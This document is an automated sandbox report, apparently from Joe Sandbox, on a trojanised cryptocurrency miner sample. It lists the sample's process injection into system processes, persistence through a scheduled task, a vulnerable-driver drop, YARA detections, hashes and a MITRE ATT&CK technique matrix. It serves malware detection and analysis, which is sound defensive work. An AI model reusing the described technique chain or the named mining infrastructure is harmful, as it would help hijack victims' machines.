                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5A614A0 cpuid
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB7A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts1
                        Command and Scripting Interpreter
                        21
                        Windows Service
                        1
                        Access Token Manipulation
                        4
                        Rootkit
                        1
                        Credential API Hooking
                        1
                        System Time Discovery
                        Remote Services1
                        Credential API Hooking
                        Exfiltration Over Other Network Medium1
                        Encrypted Channel
                        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Service Execution
                        1
                        DLL Side-Loading
                        21
                        Windows Service
                        11
                        Masquerading
                        LSASS Memory221
                        Security Software Discovery
                        Remote Desktop Protocol1
                        Archive Collected Data
                        Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain Accounts1
                        Native API
                        Logon Script (Windows)712
                        Process Injection
                        1
                        Disable or Modify Tools
                        Security Account Manager1
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)1
                        DLL Side-Loading
                        31
                        Virtualization/Sandbox Evasion
                        NTDS31
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Access Token Manipulation
                        LSA Secrets1
                        Application Window Discovery
                        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common712
                        Process Injection
                        Cached Domain Credentials2
                        File and Directory Discovery
                        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Hidden Files and Directories
                        DCSync22
                        System Information Discovery
                        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Obfuscated Files or Information
                        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                        DLL Side-Loading
                        /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                        File Deletion
                        Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 884914 Sample: file.exe Startdate: 09/06/2023 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Multi AV Scanner detection for dropped file 2->62 64 9 other signatures 2->64 8 file.exe 2 2->8         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 3 other processes 2->16 process3 file4 52 C:\Users\user\AppData\...\dxpserver.exe, PE32+ 8->52 dropped 54 C:\Users\user\AppData\...\bjmgommvilsr.tmp, PE32+ 8->54 dropped 76 Writes to foreign memory regions 8->76 78 Modifies the context of a thread in another process (thread injection) 8->78 80 Found hidden mapped module (file has been removed from disk) 8->80 82 2 other signatures 8->82 18 dialer.exe 1 8->18         started        21 conhost.exe 12->21         started        23 sc.exe 1 12->23         started        33 4 other processes 12->33 25 conhost.exe 14->25         started        35 4 other processes 14->35 27 conhost.exe 16->27         started        29 conhost.exe 16->29         started        31 conhost.exe 16->31         started        signatures5 process6 signatures7 66 Contains functionality to inject code into remote processes 18->66 68 Writes to foreign memory regions 18->68 70 Allocates memory in foreign processes 18->70 72 3 other signatures 18->72 37 svchost.exe 18->37 injected 39 lsass.exe 6 18->39 injected 42 dwm.exe 18->42 injected 44 22 other processes 18->44 process8 signatures9 46 dxpserver.exe 5 37->46         started        74 Writes to foreign memory regions 39->74 50 WMIADAP.exe 4 39->50         started        process10 file11 56 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 46->56 dropped 84 Multi AV Scanner detection for dropped file 46->84 86 Writes to foreign memory regions 46->86 88 Modifies the context of a thread in another process (thread injection) 46->88 90 4 other signatures 46->90 signatures12

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe41%ReversingLabsWin64.Trojan.Barys
                        file.exe35%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp44%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                        C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp64%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys5%ReversingLabs
                        C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys2%VirustotalBrowse
                        C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe41%ReversingLabsWin64.Trojan.Barys
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        http://www.microsoft.co0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://www.microsoft.cok0%Avira URL Cloudsafe
                        http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt00%Avira URL Cloudsafe
                        No contacted domains info
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.microsoft.cokpowershell.exe, 0000000C.00000003.539682718.000002BB4D166000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://go.micropowershell.exe, 0000000C.00000003.516711520.000002BB36805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB369C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB368D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.516711520.000002BB3690E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000003.521657211.000002BB3625E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/powershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.microsoft.copowershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 0000000C.00000002.569268170.000002BB44BEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.544110092.000002BB34B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.micro.com/pki/certs/MicRooCerAut_2010-06-23.crt0powershell.exe, 0000000C.00000002.573322482.000002BB4D076000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      No contacted IP infos
                                      Joe Sandbox Version:37.1.0 Beryl
                                      Analysis ID:884914
                                      Start date and time:2023-06-09 13:28:13 +02:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 13m 2s
                                      Hypervisor based Inspection enabled:false
                                      Report type:light
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:26
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:25
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample file name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.mine.winEXE@44/68@0/0
                                      EGA Information:
                                      • Successful, ratio: 60%
                                      HDC Information:
                                      • Successful, ratio: 32.3% (good quality ratio 29.4%)
                                      • Quality average: 63.1%
                                      • Quality standard deviation: 32.9%
                                      HCA Information:
                                      • Successful, ratio: 61%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): conhost.exe, WmiPrvSE.exe, schtasks.exe
                                      • Excluded domains from analysis (whitelisted): gulf.moneroocean.stream, conn.gta5cheatcode.world, pastebin.com, ppanel.freaktorrentz.xyz
                                      • Execution Graph export aborted for target file.exe, PID 7028 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 3804 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      TimeTypeDescription
                                      13:29:08API Interceptor1x Sleep call for process: file.exe modified
                                      13:29:19API Interceptor83x Sleep call for process: powershell.exe modified
                                      13:29:38Task SchedulerRun new task: sethc path: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      13:30:04API Interceptor1x Sleep call for process: dxpserver.exe modified
                                      No context
                                      No context
                                      No context
                                      No context
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.34726597513537405
                                      Encrypted:false
                                      SSDEEP:3:Nlll:Nll
                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                      Malicious:false
                                      Preview:@...e...........................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):5536256
                                      Entropy (8bit):6.689058470432344
                                      Encrypted:false
                                      SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                      MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                      SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                      SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                      SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: XMRIG_Monero_Miner, Description: Detects Monero mining software, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Florian Roth (Nextron Systems)
                                      • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Florian Roth (Nextron Systems)
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: Joe Security
                                      • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: ditekSHen
                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp, Author: unknown
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 44%
                                      • Antivirus: Virustotal, Detection: 64%, Browse
                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                      Process:C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):14544
                                      Entropy (8bit):6.2660301556221185
                                      Encrypted:false
                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n, Description: Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, Source: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys, Author: Florian Roth
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      • Antivirus: Virustotal, Detection: 2%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):10264640
                                      Entropy (8bit):7.644002604978999
                                      Encrypted:false
                                      SSDEEP:98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+
                                      MD5:EEE7B971E0B76A0DF56BDAC2AC2FA343
                                      SHA1:C80F9D9DE5D0DFF115BBB7638554DADE321D7C65
                                      SHA-256:ECD60313BA990F1300B37DB4064977E83F109FDF93A728CF434106C1B5B5A2D5
                                      SHA-512:FFFD216C820B3BE324AC72A46C50683B42218DEAF95C219670C3F44C091424E8ED5FC42B28F4AAB46E8024A52CBE4CA989031CA3641536F3FAE0A2B5F4F79E85
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 41%
                                      Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......d...............&.....\...*.............@...................................$....`... .................................................4...........@..0....`..@@......0............................ ..(.......................P............................text... ...........................`..`.data....&.......(..................@....rdata..pB......D.................@..@.pdata..0....@......................@..@.xdata..D....`.......0..............@..@.bss.....(...p...........................idata..4............@..............@....CRT....`............L..............@....tls.................N..............@....rsrc...............P..............@....reloc..0............\..............@..B........................................................................................................................................................................
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):3444
                                      Entropy (8bit):5.011954215267298
                                      Encrypted:false
                                      SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                      MD5:B133A676D139032A27DE3D9619E70091
                                      SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                      SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                      SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                      Malicious:false
                                      Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                      Process:C:\Windows\System32\wbem\WMIADAP.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):924
                                      Entropy (8bit):2.8598329685344623
                                      Encrypted:false
                                      SSDEEP:12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG
                                      MD5:2667367F9339639AF825E7122CE3B2A3
                                      SHA1:56E33B464F9AD8D0A6AC3343A85D7618D590FEDC
                                      SHA-256:B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F
